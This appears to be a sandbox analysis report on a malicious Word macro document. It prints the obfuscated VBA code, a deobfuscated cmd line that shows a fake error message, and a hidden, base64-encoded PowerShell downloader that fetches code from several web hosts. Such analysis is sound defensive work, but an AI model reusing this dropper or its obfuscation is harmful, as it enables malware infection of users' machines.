sh bAnx [ sh bAHx [ sh bQAx [ sh bJwx [ sh bAsx [ sh bACx [ sh bcAx [ sh bUwx [ sh bBZx [ sh bAHx [ sh bMAx [ sh bJwx [ sh bAsx [ sh bACx [ sh bcAx [ sh bTQx [ sh bAnx [ sh bACx [ sh bwAx [ sh bJwx [ sh bBzx [ sh bAEx [ sh bUAx [ sh bUgx [ sh bBWx [ sh bAGx [ sh bkAx [ sh bQwx [ sh bBFx [ sh bACx [ sh bcAx [ sh bLAx [ sh bAnx [ sh bAFx [ sh bAAx [ sh bbwx [ sh bBJx [ sh bAEx [ sh b4Ax [ sh bJwx [ sh bAsx [ sh bACx [ sh bcAx [ sh bdAx [ sh bAnx [ sh bACx [ sh bwAx [ sh bJwx [ sh bBhx [ sh bAEx [ sh b4Ax [ sh bYQx [ sh bBnx [ sh bACx [ sh bcAx [ sh bKQx [ sh bApx [ sh bACx [ s,"x [ sh b",) -> cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IABTAGUAVAAtAHYAQQBSAGkAYQBCAEwAZQAgACgAIgBUADQAIgArACIASwBkADYAIgApACAAKAAgAFsAVAB5AHAAZQBdACgAIgB7ADIAfQB7ADMAfQB7ADUAfQB7ADAAfQB7ADQAfQB7ADEAfQAiACAALQBGACAAJwByAGUAJwAsACcAcgBZACcALAAnAFMAWQAnACwAJwBzAFQAZQAnACwAJwBjAHQATwAnACwAJwBtAC4ASQBvAC4ARABJACcAKQAgACkAOwAgACAAIAAgAFMARQB0ACAAIAA0ADIAOAAgACgAIAAgAFsAVABZAHAAZQBdACgAIgB7ADMAfQB7ADcAfQB7ADAAfQB7ADUAfQB7ADYAfQB7ADIAfQB7ADQAfQB7ADgAfQB7ADEAfQAiAC0AZgAnAEUATQAuAG4ARQBUAC4AJwAsACcAZQByACcALAAnAHQAJwAsACcAUwBZAHMAJwAsACcATQAnACwAJwBzAEUAUgBWAGkAQwBFACcALAAnAFAAbwBJAE4AJwAsACcAdAAnACwAJwBhAE4AYQBnACcAKQApACAAIAA7ACAAIAAkAEoAcgBuAHoAbQBrAHMAPQAkAEEAMQA2AEwAIAArACAAWwBjAGgAYQByAF0AKAAzADMAKQAgACsAIAAkAFkAMQAxAEYAOwAkAE0AMgAwAE0APQAoACcATwAxACcAKwAnADgAVwAnACkAOwAgACAAKABJAHQAZQBNACAAKAAiAFYAQQByAEkAQQBCAGwARQA6AFQANABrACIAKwAiAEQAIgArACIANgAiACkAIAAgACkALgB2AEEAbABVAGUAOgA6ACIAQwByAGUAQQBUAGAARQBkAEkAUgBlAEMAdABgAE8AcgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAewAwAH0AJwArACcAUwBuAHUAdgB3ADIAdwB7ADAAJwArACcAfQBWACcAKwAnADQANgAnACsAJwA1ADEAcAB6AHsAMAAnACsAJwB9ACcAKQAgAC0ARgBbAEMASABhAHIAXQA5ADIAKQApADsAJABFADIAMABWAD0AKAAoACcAQgAxACcAKwAnADMAJwApACsAJwBBACcAKQA7ACAAIAAkADQAMgA4ADoAOgAiAHMARQBjAHUAYABSAGAAaQB0AHkAUABgAFIAYABPAFQAbwBjAG8AbAAiACAAPQAgACgAKAAnAFQAJwArACcAbABzADEAJwApACsAJwAyACcAKQA7ACQARQBfADkAUQA9ACgAKAAnAEcAJwArACcAOQAxACcAKQArACcATgAnACkAOwAkAFcAcwB4AHcANQAyAHoAIAA9ACAAKAAnAEgAJwArACgAJwA2ADQAJwArACcAQwAnACkAKQA7ACQATAAwADQATgA9ACgAJwBWACcAKwAoACcAMQA2ACcAKwAnAEYAJwApACkAOwAkAFgAZABuADUAeABoAGcAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAfQBTAG4AdQB2AHcAJwArACcAMgB3AHsAMAB9AFYAJwArACgAJwA0ADYANQAnACsAJwAxAHAAJwApACsAJwB6AHsAMAB9ACcAKQAtAEYAWwBDAEgAYQByAF0AOQAyACkAKwAkAFcAcwB4AHcANQAyAHoAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFgAMgA4AEcAPQAoACcAVwAwACcAKwAnADEARQAnACkAOwAkAE8AMwAzADgAXwA3ADcAPQAnAGgAJwAgACsAIAAnAHQAdAAnACAAKwAgACcAcAAnADsAJABYAGEAcAAxAGwAbQBhAD0AKAAnAHgAJwArACcAIAAnACsAKAAnAFsAJwArACcAIABzAGgAIABiADoAJwArACcALwAvACcAKQArACgAJwBjAG8AJwArACcAdwBvAHIAJwApACsAKAAnAGsAJwArACcAaQBuAGcAcABsACcAKQArACcAdQBzACcAKwAnAC4AJwArACgAJwBlAHMAJwArACcALwB3ACcAKQArACgAJwBwAC0AYQAnACsAJwBkAG0AaQBuACcAKwAnAC8ARgB4AG0AJwApACsAKAAnAE0ARQAnACsAJwAvACcAKQArACcAIQAnACsAJwB4ACcAKwAnACAAWwAnACsAJwAgACcAKwAnAHMAaAAnACsAKAAnACAAYgAnACsAJwA6ACcAKwAnAC8ALwBzAGkAbABrACcAKwAnAG8AJwApACsAKAAnAG4AYgB1ACcAKwAnAHMAaQAnACkAKwAnAG4AZQAnACsAKAAnAHMAcwAuACcAKwAnAG0AJwApACsAJwBhACcAKwAoACcAdAAnACsAJwByAGkAeABpAG4AJwArACcAZgBvAHQAZQBjACcAKwAnAGgAcwBvAGwAdQB0AGkAJwApACsAKAAnAG8AbgAuAGMAJwArACcAbwAnACkAKwAnAG0AJwArACgAJwAvACcAKwAnAGoAcwAnACkAKwAoACcALwAnACsAJwBxADIANgAnACkAKwAoACcALwAhACcAKwAnAHgAIABbACcAKQArACcAIAAnACsAJwBzAGgAJwArACgAJwAgAGIAJwArACcAcwA6AC8AJwApACsAJwAvACcAKwAoACcAYgBiAGoAJwArACcAdQAnACkAKwAoACcAZwB1ACcAKwAnAGUAdABlAHIAJwArACcAaQBhACcAKQArACgAJwAuAGMAbwBtACcAKwAnAC8AcwA2AGsAJwApACsAKAAnAHMAYwAnACsAJwB4ACcAKQArACcALwAnACsAJwBaACcAKwAoACcALwAhACcAKwAnAHgAJwApACsAJwAgAFsAJwArACcAIAAnACsAJwBzACcAKwAoACcAaAAnACsAJwAgACcAKwAnAGIAcwA6AC8AJwApACsAJwAvACcAKwAoACcAdwB3ACcAKwAnAHcAJwApACsAJwAuAGIAJwArACcAaQAnACsAJwBtACcAKwAnAGMAZQAnACsAJwBwACcAKwAnAHQAaQAnACsAKAAnAG8AbgAuAGMAJwArACcAbwAnACkAKwAoACcAbQAvAHcAJwArACcAcAAtAGEAZABtAGkAbgAvAHMASAB5ACcAKwAnADUAdAAvACcAKwAnACEAeAAgAFsAJwArACcAIAAnACsAJwBzACcAKwAnAGgAIABiADoALwAvAGEAcgBtAGEAawAnACkAKwAnAG8AbgAnACsAKAAnAGEAcgAnACsAJwBtAHMALgAnACsAJwBjACcAKQArACcAbwAnACsAJwBtAC8AJwArACcAdwAnACsAKAAnAHAALQBpACcAKwAnAG4AJwApACsAKAAnAGMAbAB1ACcAKwAnAGQAZQAnACsAJwBzAC8AZgB6AC8AJwArACcAIQAnACkAKwAnAHgAIAAnACsAKAAnAFsAJwArACcAIABzACcAKQArACgAJwBoACcAKwAnACAAYgA6AC8AJwArACcALwBhAGwAJwApACsAKAAnAHUAJwArACcAZwAnACsAJwByAGEAbQBhAC4AYwAnACkAKwAoACcAbwBtACcAKwAnAC4AJwApACsAJwBtACcAKwAnAHgAJwArACcALwAnACsAJwB0AC8AJwArACgAJwAyAC8AIQB4ACcAKwAnACAAJwArACcAWwAgAHMAaAAnACkAKwAoACcAIABiACcAKwAnADoAJwApACsAKAAnAC8AJwArACcALwBoAG8AJwApACsAJwBtAGUAJwArACgAJwBjAGEAcwBzAC4AYwBvACcAKwAnAG0ALwAnACsAJwB3AHAAJwApACsAKAAnAC0AYwAnACsAJwBvAG4AdAAnACkAKwAoACcAZQBuAHQAJwArACcALwBpAEYAJwArACcALwAnACkAKQAuACIAUgBlAGAAUABsAGAAQQBDAGUAIgAoACgAJwB4ACAAJwAr

                                                                    Zi0fdg4qf12t

                                                                    ElQBeG

                                                                    Paragraphs

                                                                    Range

                                                                    Range

                                                                    UBound

                                                                    xhcZSBIH

                                                                    MidB$

                                                                    fPExO

                                                                    Paragraphs

                                                                    Range

                                                                    Range

                                                                    UBound

                                                                    obcJwDFA

                                                                    MidB$

                                                                    FVoXJ

                                                                    Paragraphs

                                                                    Range

                                                                    Range

                                                                    UBound

                                                                    ZGOfHDFZ

                                                                    MidB$

                                                                    StringsDecrypted Strings
                                                                    "sadsaccc"
                                                                    "sasdsacc"
                                                                    "sadsaccc"
                                                                    "sasdsacc"
                                                                    "sasdsacc"
                                                                    "sasdsacc"
                                                                    "sadsaccc"
                                                                    "sasdsacc"
                                                                    "sadsaccc"
                                                                    "sasdsacc"
                                                                    "sasdsacc"
                                                                    "sasdsacc"
                                                                    "sadsaccc"
                                                                    "sasdsacc"
                                                                    "sadsaccc"
                                                                    "sasdsacc"
                                                                    "sasdsacc"
                                                                    "sasdsacc"
                                                                    "x [ sh b"
                                                                    "sadsaccc"
                                                                    "sasdsacc"
                                                                    "sadsaccc"
                                                                    "sasdsacc"
                                                                    "sasdsacc"
                                                                    "sasdsacc"
                                                                    "sadsaccc"
                                                                    "sasdsacc"
                                                                    "sadsaccc"
                                                                    "sasdsacc"
                                                                    "sasdsacc"
                                                                    "sasdsacc"
                                                                    "sadsaccc"
                                                                    "sasdsacc"
                                                                    "sadsaccc"
                                                                    "sasdsacc"
                                                                    "sasdsacc"
                                                                    "sasdsacc"
                                                                    LineInstructionMeta Information
                                                                    324

                                                                    Function Yw0lmj9uz2sfz0(Vld8aalp9dc)

                                                                    325

                                                                    Goto nhgrV

                                                                    executed
                                                                    326

                                                                    Set nfGGCgIdG = JltZHC

                                                                    JltZHC

                                                                    327

                                                                    Dim cxvFCyK, lTApi, gLahNHF as Long

                                                                    328

                                                                    Dim ooYfBGDHB as Word.Paragraph

                                                                    329

                                                                    Dim hVgaFGj() as Byte

                                                                    330

                                                                    For Each ooYfBGDHB in Tvh1u8793dltn9.Paragraphs

                                                                    Paragraphs

                                                                    331

                                                                    hVgaFGj = ooYfBGDHB.Range

                                                                    Range

                                                                    332

                                                                    dscc = "sadsaccc" & ooYfBGDHB.Range

                                                                    Range

                                                                    333

                                                                    lTApi = UBound(hVgaFGj) - 1

                                                                    UBound

                                                                    334

                                                                    cxvFCyK = 0

                                                                    335

                                                                    Set QDRLrCD = hbrLsIIaJ

                                                                    hbrLsIIaJ

                                                                    336

                                                                    Do Until lTApi > lTApi

                                                                    337

                                                                    If hVgaFGj(lTApi) = 46 Or lTApi = lTApi Then

                                                                    338

                                                                    dscc = "sasdsacc" & (cxvFCyK / 2) + 1 & " to " & (lTApi / 2) + 1 & MidB$(hVgaFGj, cxvFCyK + 1, lTApi - cxvFCyK + 3)

                                                                    MidB$

                                                                    339

                                                                    cxvFCyK = lTApi + 2

                                                                    340

                                                                    Endif

                                                                    341

                                                                    lTApi = lTApi + 2

                                                                    342

                                                                    Loop

                                                                    343

                                                                    Next

                                                                    Paragraphs

                                                                    343

                                                                    nhgrV:

                                                                    345

                                                                    Goto NelhA

                                                                    346

                                                                    Set nVwvHB = iyOuxJbS

                                                                    iyOuxJbS

                                                                    347

                                                                    Dim fiGUDJCof, ccUPI, xFjGF as Long

                                                                    348

                                                                    Dim TIdZDCk as Word.Paragraph

                                                                    349

                                                                    Dim BMzteJlIE() as Byte

                                                                    350

                                                                    For Each TIdZDCk in Tvh1u8793dltn9.Paragraphs

                                                                    Paragraphs

                                                                    351

                                                                    BMzteJlIE = TIdZDCk.Range

                                                                    Range

                                                                    352

                                                                    dscc = "sadsaccc" & TIdZDCk.Range

                                                                    Range

                                                                    353

                                                                    ccUPI = UBound(BMzteJlIE) - 1

                                                                    UBound

                                                                    354

                                                                    fiGUDJCof = 0

                                                                    355

                                                                    Set MSHSTFGF = vcpiDgaED

                                                                    vcpiDgaED

                                                                    356

                                                                    Do Until ccUPI > ccUPI

                                                                    357

                                                                    If BMzteJlIE(ccUPI) = 46 Or ccUPI = ccUPI Then

                                                                    358

                                                                    dscc = "sasdsacc" & (fiGUDJCof / 2) + 1 & " to " & (ccUPI / 2) + 1 & MidB$(BMzteJlIE, fiGUDJCof + 1, ccUPI - fiGUDJCof + 3)

                                                                    MidB$

                                                                    359

                                                                    fiGUDJCof = ccUPI + 2

                                                                    360

                                                                    Endif

                                                                    361

                                                                    ccUPI = ccUPI + 2

                                                                    362

                                                                    Loop

                                                                    363

                                                                    Next

                                                                    Paragraphs

                                                                    363

                                                                    NelhA:

                                                                    365

                                                                    Goto qjZyxC

                                                                    366

                                                                    Set fPJtR = TVnICGBMg

                                                                    TVnICGBMg

                                                                    367

                                                                    Dim OGmjSHH, dxYfn, tsgajz as Long

                                                                    368

                                                                    Dim VwecCsW as Word.Paragraph

                                                                    369

                                                                    Dim jpCcJn() as Byte

                                                                    370

                                                                    For Each VwecCsW in Tvh1u8793dltn9.Paragraphs

                                                                    Paragraphs

                                                                    371

                                                                    jpCcJn = VwecCsW.Range

                                                                    Range

                                                                    372

                                                                    dscc = "sadsaccc" & VwecCsW.Range

                                                                    Range

                                                                    373

                                                                    dxYfn = UBound(jpCcJn) - 1

                                                                    UBound

                                                                    374

                                                                    OGmjSHH = 0

                                                                    375

                                                                    Set ShwUGEG = HoDns

                                                                    HoDns

                                                                    376

                                                                    Do Until dxYfn > dxYfn

                                                                    377

                                                                    If jpCcJn(dxYfn) = 46 Or dxYfn = dxYfn Then

                                                                    378

                                                                    dscc = "sasdsacc" & (OGmjSHH / 2) + 1 & " to " & (dxYfn / 2) + 1 & MidB$(jpCcJn, OGmjSHH + 1, dxYfn - OGmjSHH + 3)

                                                                    MidB$

                                                                    379

                                                                    OGmjSHH = dxYfn + 2

                                                                    380

                                                                    Endif

                                                                    381

                                                                    dxYfn = dxYfn + 2

                                                                    382

                                                                    Loop

                                                                    383

                                                                    Next

                                                                    Paragraphs

                                                                    383

                                                                    qjZyxC:

                                                                    385

                                                                    Yw0lmj9uz2sfz0 = Replace(Vld8aalp9dc, "x [ sh b", Zi0fdg4qf12t)

                                                                    Replace("wx [ sh binx [ sh bmx [ sh bgmx [ sh btx [ sh bx [ sh bx [ sh bx [ sh bsx [ sh bx [ sh bx [ sh b:wx [ sh bx [ sh binx [ sh b3x [ sh b2x [ sh b_x [ sh bx [ sh bpx [ sh bx [ sh brox [ sh bx [ sh bcex [ sh bsx [ sh bsx [ sh bx [ sh b","x [ sh b",) -> winmgmts:win32_process

                                                                    Zi0fdg4qf12t

                                                                    executed
                                                                    386

                                                                    Goto CMhXU

                                                                    387

                                                                    Set yEbqhrSDE = ElQBeG

                                                                    ElQBeG

                                                                    388

                                                                    Dim KGTisCFg, htkDBkB, QbynDCF as Long

                                                                    389

                                                                    Dim wUyzGJ as Word.Paragraph

                                                                    390

                                                                    Dim YXZHHCaB() as Byte

                                                                    391

                                                                    For Each wUyzGJ in Tvh1u8793dltn9.Paragraphs

                                                                    Paragraphs

                                                                    392

                                                                    YXZHHCaB = wUyzGJ.Range

                                                                    Range

                                                                    393

                                                                    dscc = "sadsaccc" & wUyzGJ.Range

                                                                    Range

                                                                    394

                                                                    htkDBkB = UBound(YXZHHCaB) - 1

                                                                    UBound

                                                                    395

                                                                    KGTisCFg = 0

                                                                    396

                                                                    Set oyFNHnHHI = xhcZSBIH

                                                                    xhcZSBIH

                                                                    397

                                                                    Do Until htkDBkB > htkDBkB

                                                                    398

                                                                    If YXZHHCaB(htkDBkB) = 46 Or htkDBkB = htkDBkB Then

                                                                    399

                                                                    dscc = "sasdsacc" & (KGTisCFg / 2) + 1 & " to " & (htkDBkB / 2) + 1 & MidB$(YXZHHCaB, KGTisCFg + 1, htkDBkB - KGTisCFg + 3)

                                                                    MidB$

                                                                    400

                                                                    KGTisCFg = htkDBkB + 2

                                                                    401

                                                                    Endif

                                                                    402

                                                                    htkDBkB = htkDBkB + 2

                                                                    403

                                                                    Loop

                                                                    404

                                                                    Next

                                                                    Paragraphs

                                                                    404

                                                                    CMhXU:

                                                                    406

                                                                    Goto BhNEmrIE

                                                                    407

                                                                    Set PDdhFK = fPExO

                                                                    fPExO

                                                                    408

                                                                    Dim YgziIE, DwikAuvE, fEtRs as Long

                                                                    409

                                                                    Dim YvQjieFc as Word.Paragraph

                                                                    410

                                                                    Dim VuThCQHH() as Byte

                                                                    411

                                                                    For Each YvQjieFc in Tvh1u8793dltn9.Paragraphs

                                                                    Paragraphs

                                                                    412

                                                                    VuThCQHH = YvQjieFc.Range

                                                                    Range

                                                                    413

                                                                    dscc = "sadsaccc" & YvQjieFc.Range

                                                                    Range

                                                                    414

                                                                    DwikAuvE = UBound(VuThCQHH) - 1

                                                                    UBound

                                                                    415

                                                                    YgziIE = 0

                                                                    416

                                                                    Set WfWmdXBB = obcJwDFA

                                                                    obcJwDFA

                                                                    417

                                                                    Do Until DwikAuvE > DwikAuvE

                                                                    418

                                                                    If VuThCQHH(DwikAuvE) = 46 Or DwikAuvE = DwikAuvE Then

                                                                    419

                                                                    dscc = "sasdsacc" & (YgziIE / 2) + 1 & " to " & (DwikAuvE / 2) + 1 & MidB$(VuThCQHH, YgziIE + 1, DwikAuvE - YgziIE + 3)

                                                                    MidB$

                                                                    420

                                                                    YgziIE = DwikAuvE + 2

                                                                    421

                                                                    Endif

                                                                    422

                                                                    DwikAuvE = DwikAuvE + 2

                                                                    423

                                                                    Loop

                                                                    424

                                                                    Next

                                                                    Paragraphs

                                                                    424

                                                                    BhNEmrIE:

                                                                    426

                                                                    Goto VcRJFFPFy

                                                                    427

                                                                    Set dMAig = FVoXJ

                                                                    FVoXJ

                                                                    428

                                                                    Dim wzAgBA, zZJyEAC, YqhWFED as Long

                                                                    429

                                                                    Dim tVHJH as Word.Paragraph

                                                                    430

                                                                    Dim DLNPo() as Byte

                                                                    431

                                                                    For Each tVHJH in Tvh1u8793dltn9.Paragraphs

                                                                    Paragraphs

                                                                    432

                                                                    DLNPo = tVHJH.Range

                                                                    Range

                                                                    433

                                                                    dscc = "sadsaccc" & tVHJH.Range

                                                                    Range

                                                                    434

                                                                    zZJyEAC = UBound(DLNPo) - 1

                                                                    UBound

                                                                    435

                                                                    wzAgBA = 0

                                                                    436

                                                                    Set swiEYEUA = ZGOfHDFZ

                                                                    ZGOfHDFZ

                                                                    437

                                                                    Do Until zZJyEAC > zZJyEAC

                                                                    438

                                                                    If DLNPo(zZJyEAC) = 46 Or zZJyEAC = zZJyEAC Then

                                                                    439

                                                                    dscc = "sasdsacc" & (wzAgBA / 2) + 1 & " to " & (zZJyEAC / 2) + 1 & MidB$(DLNPo, wzAgBA + 1, zZJyEAC - wzAgBA + 3)

                                                                    MidB$

                                                                    440

                                                                    wzAgBA = zZJyEAC + 2

                                                                    441

                                                                    Endif

                                                                    442

                                                                    zZJyEAC = zZJyEAC + 2

                                                                    443

                                                                    Loop

                                                                    444

                                                                    Next

                                                                    Paragraphs

                                                                    444

                                                                    VcRJFFPFy:

                                                                    446

                                                                    End Function

                                                                    Function K532dwnyk0pybrc, APIs: 72, Strings: 24, Number of lines: 86, Relevance: 144.086
                                                                    APIsMeta Information

                                                                    bHGFAGJ

                                                                    Paragraphs

                                                                    Range

                                                                    Range

                                                                    UBound

                                                                    OaOIEKmCA

                                                                    MidB$

                                                                    DHwdFs

                                                                    Paragraphs

                                                                    Range

                                                                    Range

                                                                    UBound

                                                                    mwvhyA

                                                                    MidB$

                                                                    Part of subcall function Yw0lmj9uz2sfz0@X1bqz0qaer43b52bf: JltZHC

                                                                    Part of subcall function Yw0lmj9uz2sfz0@X1bqz0qaer43b52bf: Paragraphs

                                                                    Part of subcall function Yw0lmj9uz2sfz0@X1bqz0qaer43b52bf: Range

                                                                    Part of subcall function Yw0lmj9uz2sfz0@X1bqz0qaer43b52bf: Range

                                                                    Part of subcall function Yw0lmj9uz2sfz0@X1bqz0qaer43b52bf: UBound

                                                                    Part of subcall function Yw0lmj9uz2sfz0@X1bqz0qaer43b52bf: hbrLsIIaJ

                                                                    Part of subcall function Yw0lmj9uz2sfz0@X1bqz0qaer43b52bf: MidB$

                                                                    Part of subcall function Yw0lmj9uz2sfz0@X1bqz0qaer43b52bf: iyOuxJbS

                                                                    Part of subcall function Yw0lmj9uz2sfz0@X1bqz0qaer43b52bf: Paragraphs

                                                                    Part of subcall function Yw0lmj9uz2sfz0@X1bqz0qaer43b52bf: Range

                                                                    Part of subcall function Yw0lmj9uz2sfz0@X1bqz0qaer43b52bf: Range

                                                                    Part of subcall function Yw0lmj9uz2sfz0@X1bqz0qaer43b52bf: UBound

                                                                    Part of subcall function Yw0lmj9uz2sfz0@X1bqz0qaer43b52bf: vcpiDgaED

                                                                    Part of subcall function Yw0lmj9uz2sfz0@X1bqz0qaer43b52bf: MidB$

                                                                    Part of subcall function Yw0lmj9uz2sfz0@X1bqz0qaer43b52bf: TVnICGBMg

                                                                    Part of subcall function Yw0lmj9uz2sfz0@X1bqz0qaer43b52bf: Paragraphs

                                                                    Part of subcall function Yw0lmj9uz2sfz0@X1bqz0qaer43b52bf: Range

                                                                    Part of subcall function Yw0lmj9uz2sfz0@X1bqz0qaer43b52bf: Range

                                                                    Part of subcall function Yw0lmj9uz2sfz0@X1bqz0qaer43b52bf: UBound

                                                                    Part of subcall function Yw0lmj9uz2sfz0@X1bqz0qaer43b52bf: HoDns

                                                                    Part of subcall function Yw0lmj9uz2sfz0@X1bqz0qaer43b52bf: MidB$

                                                                    Part of subcall function Yw0lmj9uz2sfz0@X1bqz0qaer43b52bf: Replace

                                                                    Part of subcall function Yw0lmj9uz2sfz0@X1bqz0qaer43b52bf: Zi0fdg4qf12t

                                                                    Part of subcall function Yw0lmj9uz2sfz0@X1bqz0qaer43b52bf: ElQBeG

                                                                    Part of subcall function Yw0lmj9uz2sfz0@X1bqz0qaer43b52bf: Paragraphs

                                                                    Part of subcall function Yw0lmj9uz2sfz0@X1bqz0qaer43b52bf: Range

                                                                    Part of subcall function Yw0lmj9uz2sfz0@X1bqz0qaer43b52bf: Range

                                                                    Part of subcall function Yw0lmj9uz2sfz0@X1bqz0qaer43b52bf: UBound

                                                                    Part of subcall function Yw0lmj9uz2sfz0@X1bqz0qaer43b52bf: xhcZSBIH

                                                                    Part of subcall function Yw0lmj9uz2sfz0@X1bqz0qaer43b52bf: MidB$

                                                                    Part of subcall function Yw0lmj9uz2sfz0@X1bqz0qaer43b52bf: fPExO

                                                                    Part of subcall function Yw0lmj9uz2sfz0@X1bqz0qaer43b52bf: Paragraphs

                                                                    Part of subcall function Yw0lmj9uz2sfz0@X1bqz0qaer43b52bf: Range

                                                                    Part of subcall function Yw0lmj9uz2sfz0@X1bqz0qaer43b52bf: Range

                                                                    Part of subcall function Yw0lmj9uz2sfz0@X1bqz0qaer43b52bf: UBound

                                                                    Part of subcall function Yw0lmj9uz2sfz0@X1bqz0qaer43b52bf: obcJwDFA

                                                                    Part of subcall function Yw0lmj9uz2sfz0@X1bqz0qaer43b52bf: MidB$

                                                                    Part of subcall function Yw0lmj9uz2sfz0@X1bqz0qaer43b52bf: FVoXJ

                                                                    Part of subcall function Yw0lmj9uz2sfz0@X1bqz0qaer43b52bf: Paragraphs

                                                                    Part of subcall function Yw0lmj9uz2sfz0@X1bqz0qaer43b52bf: Range

                                                                    Part of subcall function Yw0lmj9uz2sfz0@X1bqz0qaer43b52bf: Range

                                                                    Part of subcall function Yw0lmj9uz2sfz0@X1bqz0qaer43b52bf: UBound

                                                                    Part of subcall function Yw0lmj9uz2sfz0@X1bqz0qaer43b52bf: ZGOfHDFZ

                                                                    Part of subcall function Yw0lmj9uz2sfz0@X1bqz0qaer43b52bf: MidB$

                                                                    prgAO

                                                                    Paragraphs

                                                                    Range

                                                                    Range

                                                                    UBound

                                                                    imnrzOF

                                                                    MidB$

                                                                    UmQHurWB

                                                                    Paragraphs

                                                                    Range

                                                                    Range

                                                                    UBound

                                                                    WhmkB

                                                                    MidB$

                                                                    StringsDecrypted Strings
                                                                    "sadsaccc"
                                                                    "sasdsacc"
                                                                    "sadsaccc"
                                                                    "sasdsacc"
                                                                    "sasdsacc"
                                                                    "sasdsacc"
                                                                    "sadsaccc"
                                                                    "sasdsacc"
                                                                    "sadsaccc"
                                                                    "sasdsacc"
                                                                    "sasdsacc"
                                                                    "sasdsacc"
                                                                    "sadsaccc"
                                                                    "sasdsacc"
                                                                    "sadsaccc"
                                                                    "sasdsacc"
                                                                    "sasdsacc"
                                                                    "sasdsacc"
                                                                    "sadsaccc"
                                                                    "sasdsacc"
                                                                    "sadsaccc"
                                                                    "sasdsacc"
                                                                    "sasdsacc"
                                                                    "sasdsacc"
                                                                    LineInstructionMeta Information
                                                                    238

                                                                    Function K532dwnyk0pybrc(Ev1oy1be511zamut8)

                                                                    239

                                                                    On Error Resume Next

                                                                    executed
                                                                    240

                                                                    Goto pzxJi

                                                                    241

                                                                    Set wrpigDnBA = bHGFAGJ

                                                                    bHGFAGJ

                                                                    242

                                                                    Dim fUGOALvdN, FKISJTLG, OpNHJEa as Long

                                                                    243

                                                                    Dim ZlnBbxF as Word.Paragraph

                                                                    244

                                                                    Dim pxjzGA() as Byte

                                                                    245

                                                                    For Each ZlnBbxF in Tvh1u8793dltn9.Paragraphs

                                                                    Paragraphs

                                                                    246

                                                                    pxjzGA = ZlnBbxF.Range

                                                                    Range

                                                                    247

                                                                    dscc = "sadsaccc" & ZlnBbxF.Range

                                                                    Range

                                                                    248

                                                                    FKISJTLG = UBound(pxjzGA) - 1

                                                                    UBound

                                                                    249

                                                                    fUGOALvdN = 0

                                                                    250

                                                                    Set xNIlBBInl = OaOIEKmCA

                                                                    OaOIEKmCA

                                                                    251

                                                                    Do Until FKISJTLG > FKISJTLG

                                                                    252

                                                                    If pxjzGA(FKISJTLG) = 46 Or FKISJTLG = FKISJTLG Then

                                                                    253

                                                                    dscc = "sasdsacc" & (fUGOALvdN / 2) + 1 & " to " & (FKISJTLG / 2) + 1 & MidB$(pxjzGA, fUGOALvdN + 1, FKISJTLG - fUGOALvdN + 3)

                                                                    MidB$

                                                                    254

                                                                    fUGOALvdN = FKISJTLG + 2

                                                                    255

                                                                    Endif

                                                                    256

                                                                    FKISJTLG = FKISJTLG + 2

                                                                    257

                                                                    Loop

                                                                    258

                                                                    Next

                                                                    Paragraphs

                                                                    258

                                                                    pzxJi:

                                                                    260

                                                                    Lynlzg8g_wcyt8ojr = Ev1oy1be511zamut8

                                                                    261

                                                                    Goto QtjyA

                                                                    262

                                                                    Set phkpFqFCH = DHwdFs

                                                                    DHwdFs

                                                                    263

                                                                    Dim nHiSH, jHDSG, udnviH as Long

                                                                    264

                                                                    Dim DLwSlnDF as Word.Paragraph

                                                                    265

                                                                    Dim pXPTCf() as Byte

                                                                    266

                                                                    For Each DLwSlnDF in Tvh1u8793dltn9.Paragraphs

                                                                    Paragraphs

                                                                    267

                                                                    pXPTCf = DLwSlnDF.Range

                                                                    Range

                                                                    268

                                                                    dscc = "sadsaccc" & DLwSlnDF.Range

                                                                    Range

                                                                    269

                                                                    jHDSG = UBound(pXPTCf) - 1

                                                                    UBound

                                                                    270

                                                                    nHiSH = 0

                                                                    271

                                                                    Set seTGCvRG = mwvhyA

                                                                    mwvhyA

                                                                    272

                                                                    Do Until jHDSG > jHDSG

                                                                    273

                                                                    If pXPTCf(jHDSG) = 46 Or jHDSG = jHDSG Then

                                                                    274

                                                                    dscc = "sasdsacc" & (nHiSH / 2) + 1 & " to " & (jHDSG / 2) + 1 & MidB$(pXPTCf, nHiSH + 1, jHDSG - nHiSH + 3)

                                                                    MidB$

                                                                    275

                                                                    nHiSH = jHDSG + 2

                                                                    276

                                                                    Endif

                                                                    277

                                                                    jHDSG = jHDSG + 2

                                                                    278

                                                                    Loop

                                                                    279

                                                                    Next

                                                                    Paragraphs

                                                                    279

                                                                    QtjyA:

                                                                    281

                                                                    E4u6ubi3v5l2 = Yw0lmj9uz2sfz0(Lynlzg8g_wcyt8ojr)

                                                                    282

                                                                    Goto XxLEEC

                                                                    283

                                                                    Set ZtgGUHFGJ = prgAO

                                                                    prgAO

                                                                    284

                                                                    Dim TMQhTRa, LZepVwu, JPHDBd as Long

                                                                    285

                                                                    Dim bkUZDN as Word.Paragraph

                                                                    286

                                                                    Dim QNtsSHe() as Byte

                                                                    287

                                                                    For Each bkUZDN in Tvh1u8793dltn9.Paragraphs

                                                                    Paragraphs

                                                                    288

                                                                    QNtsSHe = bkUZDN.Range

                                                                    Range

                                                                    289

                                                                    dscc = "sadsaccc" & bkUZDN.Range

                                                                    Range

                                                                    290

                                                                    LZepVwu = UBound(QNtsSHe) - 1

                                                                    UBound

                                                                    291

                                                                    TMQhTRa = 0

                                                                    292

                                                                    Set MxAtNhGI = imnrzOF

                                                                    imnrzOF

                                                                    293

                                                                    Do Until LZepVwu > LZepVwu

                                                                    294

                                                                    If QNtsSHe(LZepVwu) = 46 Or LZepVwu = LZepVwu Then

                                                                    295

                                                                    dscc = "sasdsacc" & (TMQhTRa / 2) + 1 & " to " & (LZepVwu / 2) + 1 & MidB$(QNtsSHe, TMQhTRa + 1, LZepVwu - TMQhTRa + 3)

                                                                    MidB$

                                                                    296

                                                                    TMQhTRa = LZepVwu + 2

                                                                    297

                                                                    Endif

                                                                    298

                                                                    LZepVwu = LZepVwu + 2

                                                                    299

                                                                    Loop

                                                                    300

                                                                    Next

                                                                    Paragraphs

                                                                    300

                                                                    XxLEEC:

                                                                    302

                                                                    K532dwnyk0pybrc = E4u6ubi3v5l2

                                                                    303

                                                                    Goto SWSoCG
